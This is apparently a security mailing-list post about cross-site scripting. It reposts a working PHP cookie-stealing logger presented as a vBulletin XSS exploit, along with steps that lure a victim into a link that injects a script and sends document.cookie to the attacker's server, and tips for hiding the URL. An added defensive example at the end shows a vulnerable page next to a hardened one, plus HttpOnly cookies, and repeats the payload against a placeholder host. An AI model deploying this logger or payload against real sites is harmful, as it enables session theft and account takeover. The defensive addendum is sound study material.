Message-ID: <BAY2-F46b6KZmcK8r6b0000036a@hotmail.com>
From: bobbymanly at hotmail.com (bobby manly)
Subject: Search Engine XSS
>
>So why not show one of these legitimate examples instead of the overused
>window popup script?
>
>It would just be easier to ascertain the level of severity if an actual DoS
>string or this "trusted internal call" was exploited.
>
>I am sure there are a lot of forms that can be a victim of an XSS string,
>but how many of them can actually be used for anything useful (from an
>attacker point of view)?
>
XSS can be used for a few different things, one of which would be to steal
cookies / logins
(please read cgisecurity.com stuff.. )
I believe some of the reason that w00d gets so much shit is because some of
those XSS don't mean shit unless it targets an admin that is somehow logged
in with valid stuffz in his cookie (but I did learn some other cool iframe
stuff from him (and others) so _I_ don't give him shit))(did I miss a ')'?)
. heh
anyways, there is some web stuff that stores too much stuff in the cookie
(or insecurely) such as logins,
so you can do a document.location and add the document.cookie as variables
... and send his cookie somewhere (usually have to get them to click a link
on site, in email, etc) and you can have a nice lil php to grab cookie
content and then redirect to a new site.. here is some code that has helped
me to learn.. it's not specific to this vbulletin exploit (well kinda).. here
is what was posted to the net, you will have to modify to fit your needs..
credits in the code :
---------------------------
<?PHP
// vBulletin XSS Injection Vulnerability: Exploit
// ---
// Coded By : Sp.IC (SpeedICNet@...mail.Com).
// Description: Fetching vBulletin's cookies and storing them into a log file.
// Variables:
$LogFile = "Cookies.Log";
// Functions:
/*
If ($HTTP_GET_VARS['Action'] = "Log") {
    $Header = "<!--";
    $Footer = "--->";
}
Else {
    $Header = "";
    $Footer = "";
}
Print ($Header);
*/
Print ("<Title>vBulletin XSS Injection Vulnerability: Exploit</Title>");
Print ("<Pre>");
Print ("<Center>");
Print ("<B>vBulletin XSS Injection Vulnerability: Exploit</B>\n");
Print ("Coded By: <B><A Href=\"MailTo:SpeedICNet@...mail.Com\">Sp.IC</A></B><Hr Width=\"20%\">");
/*
Print ($Footer);
*/
Switch ($HTTP_GET_VARS['Action']) {
    Case "Log":
        $Data = $HTTP_GET_VARS['Cookie'];
        // Obfuscated arithmetic: strips a fixed number of leading characters from the submitted cookie string.
        $Data = StrStr ($Data, SubStr ($Data, BCAdd (0x0D, StrLen (DecHex (MD5 (NULL))))));
        $Log = FOpen ($LogFile, "a+");
        FWrite ($Log, Trim ($Data) . "\n");
        FClose ($Log);
        Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"0; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
        Break;
    Case "List":
        // As posted this read In_Array ($Records) with one argument and $Records not yet set;
        // an empty-file check is what was meant.
        If (!File_Exists ($LogFile) || Count (File ($LogFile)) == 0) {
            Print ("<Br><Br><B>There are No Records</B></Center></Pre>");
            Exit ();
        }
        Else {
            Print ("</Center></Pre>");
            $Records = Array_UniQue (File ($LogFile));
            Print ("<Pre>");
            Print ("<B>.:: Statistics</B>\n");
            Print ("\n");
            Print ("o Logged Records : <B>" . Count (File ($LogFile)) . "</B>\n");
            Print ("o Listed Records : <B>" . Count ($Records) . "</B> [Not Counting Duplicates]\n");
            Print ("\n");
            Print ("<B>.:: Options</B>\n");
            Print ("\n");
            If (Count (File ($LogFile)) > 0) {
                $Link['Download'] = "[<A Href=\"" . $LogFile . "\">Download</A>]";
            }
            Else {
                $Link['Download'] = "[No Records in Log]";
            }
            Print ("o Download Log : " . $Link['Download'] . "\n");
            // As posted this used an undefined $SCRIPT_PATH; the script's own path is meant.
            Print ("o Clear Records : [<A Href=\"" . $HTTP_SERVER_VARS['SCRIPT_NAME'] . "?Action=Delete\">Y</A>]\n");
            Print ("\n");
            Print ("<B>.:: Records</B>\n");
            Print ("\n");
            While (List ($Line[0], $Line[1]) = Each ($Records)) {
                Print ("<B>" . $Line[0] . ": </B>" . $Line[1]);
            }
        }
        Print ("</Pre>");
        Break;
    Case "Delete":
        @UnLink ($LogFile);
        Print ("<Br><Br><B>Deleted Successfully</B></Center></Pre>") Or
            Die ("<Br><Br><B>Error: Cannot Delete Log</B></Center></Pre>");
        Print ("<Meta HTTP-Equiv=\"Refresh\" Content=\"3; URL=" . $HTTP_SERVER_VARS['HTTP_REFERER'] . "\">");
        Break;
}
?>
- Give a victim this link:
member2.php?s=[Session]&action=viewsubscription&perpage=[Script Code]
- Note: You can replace [Script Code] with:
--><Script>location='Http://[Exploit Path]?Action=Log&Cookie='+(document.cookie);</Script>
- Then go to Http://[Exploit Path]?Action=List
--------------------------------
what's funny is that at the time this came out, there was also script
injection possible in the <b> tag of the actual forum message, so you could
do some OnMouse.over junk to help hide the actual URL .. heh
.. I would say any XSS would be worth a look.. but not all will actually
get you shit
later,
kid
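A defender's view of the bug class the post describes, as an added example that is neither the post's code nor vBulletin's: a hypothetical page reflects a perpage parameter inside an HTML comment the way the payload above relies on (it begins with "-->" to close the comment), shown beside a hardened version that validates the value as an integer, encodes what it echoes, and marks the session cookie HttpOnly so document.cookie cannot read it. The host logger.invalid and the function names are constructed for the example.

```php
<?php
// Added example, not vBulletin's code and not from the post. The vulnerable
// render mirrors the bug class the payload above relies on: an untrusted
// "perpage" value is reflected inside an HTML comment, so a value beginning
// with "-->" closes the comment and everything after it is live markup.
function renderVulnerable(string $perpage): string
{
    // BAD: raw reflection of request input into the page.
    return "<!-- perpage=" . $perpage . " -->\n<p>Subscriptions</p>\n";
}

function renderHardened(string $perpage): string
{
    // 1. perpage is a number: validate type and range rather than "sanitise".
    $n = filter_var($perpage, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100]]);
    if ($n === false) {
        $n = 20; // use a default instead of echoing anything attacker-controlled
    }
    // 2. Whatever is echoed still goes through a context-aware encoder.
    //    Inside an HTML comment "--" is the only way out, so neutralise it too.
    $safe = str_replace('--', '- -', htmlspecialchars((string) $n, ENT_QUOTES, 'UTF-8'));
    return "<!-- perpage=" . $safe . " -->\n<p>Subscriptions</p>\n";
}

// 3. Even if a reflection slips through, HttpOnly keeps the session id out of
//    document.cookie, which is exactly what the logger script above collects.
function configureSessionCookie(): void
{
    session_set_cookie_params([
        'lifetime' => 0, 'path' => '/', 'secure' => true,
        'httponly' => true, 'samesite' => 'Lax',
    ]);
}

if (PHP_SAPI === 'cli') {
    // Constructed payload in the shape of the one above; logger.invalid is a placeholder host.
    $payload = "--><script>location='http://logger.invalid/?c='+document.cookie</script>";
    echo renderVulnerable($payload); // the <script> lands outside the comment
    echo renderHardened($payload);   // prints "<!-- perpage=20 -->" and the paragraph
}
```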